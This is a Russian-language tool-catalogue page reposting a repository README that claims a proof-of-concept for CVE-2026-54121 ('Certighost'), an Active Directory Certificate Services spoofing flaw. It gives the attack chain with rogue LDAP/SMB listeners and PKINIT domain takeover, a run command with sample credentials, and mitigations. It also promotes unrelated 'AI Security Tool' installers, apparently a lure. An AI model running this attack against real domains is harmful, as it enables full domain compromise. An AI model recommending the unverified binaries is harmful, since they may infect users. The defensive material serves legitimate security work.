Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/zerodayevil/cve-2026-54121-certighost
Повышение привилегийАнализ уязвимостейЭксплуатацияИнструменты для выдачи себя за другое лицоПост-эксплуатацияТестирование на ПроникновениеАутентификацияСтатьи и ИсследованияRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubzerodayevil/cve-2026-54121-certighost

CVE-2026-54121-Certighost

Модуль proof-of-concept для CVE-2026-54121 (Certighost), эксплуатирующий проверку регистрации AD CS через поддельные слушатели LDAP/SMB для выдачи себя за контроллер домена и повышения привилегий через PKINIT.

Репозиторий
13 ч 41 мин назадЕщё не проверено

🛡 Модуль AI Security Tool
CVE-2026-54121: Подмена удостоверений в Active Directory Certificate Services (Certighost)

Официальный модуль аудита безопасности для экосистемы AI Security Tool


Latest Release Build Status Donations Telegram Channel License

🌐 Веб-демо • 📚 Сайт проекта • 💬 Чат сообщества

Навигация по сайту: Главная • Обновления • Загрузки • Модули

AI Security Tool Banner


🧠 Концептуальный обзор

Этот модуль предоставляет диагностические возможности для CVE-2026-54121, получившей название Certighost. Уязвимость существует в Active Directory Certificate Services (AD CS) на этапе проверки при регистрации сертификатов компьютерных учётных записей.

Злоумышленник, обладающий стандартными низкопривилегированными учётными данными домена, создаёт новую компьютерную учётную запись и отправляет запрос на сертификат, содержащий подконтрольные атрибуты cdc (controlled IP listener) и rmd (target DC FQDN). Когда центр сертификации (CA) устанавливает обратное соединение для проверки подлинности машины, поддельные слушатели LDAP (порт 389) и SMB/LSA (порт 445) подменяют атрибуты идентичности целевого контроллера домена (sAMAccountName, SID, dNSHostName). Это заставляет CA выдать подлинный сертификат контроллера домена, что позволяет полностью скомпрометировать домен через PKINIT.

🎯 Основная суть воздействия

«Аутентифицируйся как машина — повысь привилегии до всего домена».
Certighost обходит традиционные разрешения шаблонов AD CS, отравляя конвейер разрешения идентичности CA. Получение действительного сертификата контроллера домена даёт мгновенную аутентификацию PKINIT, предоставляя как кэш учётных данных TGT (.ccache), так и NT-хэш целевого контроллера домена.

📊 Характеристики уязвимости

🕸 Сценарий атаки и архитектура

root@kitploit:~
graph TD
    A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
    A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
    A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
    D -->|4. CA Lookups Connect to Rogue Listeners| C
    C -->|5. Validate via Netlogon & Return Target DC Identity| D
    D -->|6. Issue Valid DC Certificate .pfx| A
    A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]

🛡 Контрольный список мер защиты

  • 🟢 Установите обновления безопасности: Разверните официальные исправления Microsoft, устраняющие CVE-2026-54121, на всех серверах AD CS.
  • 🟢 Ограничьте создание компьютерных учётных записей: Установите для ms-DS-MachineAccountQuota значение 0, чтобы запретить непривилегированным пользователям создавать новые объекты компьютеров.
  • 🟡 Усиление защиты AD CS: Отключите уязвимые шаблоны сертификатов и убедитесь, что EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) отключён, если он явно не требуется.
  • 🟡 Сетевая фильтрация: Блокируйте исходящий трафик SMB (445) и LDAP (389) с серверов CA к произвольным рабочим станциям.

💻 Как запустить этот модуль

⚠️ ВАЖНО: Этот модуль предназначен для безопасного диагностического тестирования в рамках платформы AI Security Tool. Запускайте его только против авторизованных целей с повышенными административными привилегиями.

1️⃣ Установите AI Security Tool

Для запуска диагностических и мониторинговых скриптов установите базовую платформу AI Security Tool:

2️⃣ Установка зависимостей и запуск

Установите необходимые библиотеки Python для поддельных слушателей LDAP/SMB и работы с сертификатами:

root@kitploit:~
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython

# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10

🔍 Модули аудита безопасности и репозитории PoC

Модули сканеров уязвимостей, PoC-скрипты и исследовательские репозитории, поддерживаемые нашим сообществом:

🔥 Удалённое выполнение кода (RCE) и сетевые уязвимости 4 модуля
  • CVE-2026-41089 — Эксплойт удалённого выполнения кода в Netlogon @ZeroDayEvil
  • CVE-2026-20805 — Proof-of-Concept удалённого выполнения кода в Windows @ZeroDayEvil
  • CVE-2026-41096 — Модуль сканера критической уязвимости RCE @ZeroDayEvil
  • CVE-2026-24291 — Удалённое выполнение кода через сетевой протокол @ZeroDayVPN
🛡 Повышение привилегий (EoP) и службы 3 модуля
  • CVE-2026-54121 — Подмена контроллера домена через AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — Повышение привилегий в службе CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — Разбор и PoC локального повышения привилегий @ZeroDayEvil
📚 Исследование уязвимостей и разборы 2 модуля
  • CVE-2026-42978 — Глубокий технический анализ и исследование PoC @ZeroDayEvil
  • CVE-2026-83991 — Полный разбор и демонстрация эксплуатации @ZeroDayVPN

⚖️ Лицензия и правовая оговорка

🚨 Отказ от ответственности

Этот инструмент и анализ безопасности предоставляются строго для авторизованного аудита систем, защитных исследований и работ по тестированию на проникновение.
Использование CVE-2026-54121 против доменных сред без явного письменного разрешения владельца системы является незаконным. Авторы не несут ответственности за несанкционированную компрометацию домена, потерю данных или нарушения в работе систем.

🔄 Вклад и сообщество

Мы приветствуем вклад сообщества исследователей безопасности! Основные направления для вклада:

  1. Интеграции с ИИ: Добавление новых провайдеров LLM и разработка специализированных агентов безопасности.
  2. Инструменты безопасности: Разработка модулей уязвимостей и интеграция CLI-сканеров.
  3. Оптимизация: Повышение скорости парсинга, безопасности выполнения и логики кэширования.
  4. Документация: Написание исследовательских работ, руководств и локализованных переводов.

🔗 Контакты и поддержка

  • Официальный сайт: ZeroDayEvil.com
  • Технический анализ: Разбор в Gist от H0j3n
  • Рекомендации MSRC: Руководство по CVE-2026-54121
  • Администратор Telegram: @ZeroDayEvil
  • Чат Telegram: @ZeroDyaTool_chat
  • Канал Telegram: @ZeroDyaTool_channel
  • Поддержать проект: Пожертвования через PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — переосмысление терминального рабочего процесса и автоматизации для специалистов по кибербезопасности.

Скачать инструмент
ХарактеристикаПрисвоенное значениеПримечания
Идентификатор CVECVE-2026-54121Подмена удостоверений в Active Directory Certificate Services
Уровень критичностиКритический (CVSS v3.1: 9.8)CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Тип уязвимостиCWE-287 / CWE-290Некорректная аутентификация / Обход аутентификации через подмену
Затронутый компонентActive Directory Certificate Services (AD CS)Регистрация сертификатов и конвейер проверки идентичности
Вектор атакиСетьВыполняется удалённо по протоколам SMB, LDAP и RPC
Требуемые привилегииНизкие привилегииСтандартная учётная запись пользователя домена (возможность добавлять компьютерные учётные записи)
ОС / ПлатформаВерсияАрхитектура / ФорматДата выпускаСтатусСсылка для загрузки
🪟 Windowsv6.3.20x64 Installer (.exe)2026-09-08🟢 ПоследняяСкачать .exe
🪟 Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08🟢 ПоследняяСкачать .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 СтабильнаяСкачать .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 СтабильнаяСкачать .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 СтабильнаяСкачать .apk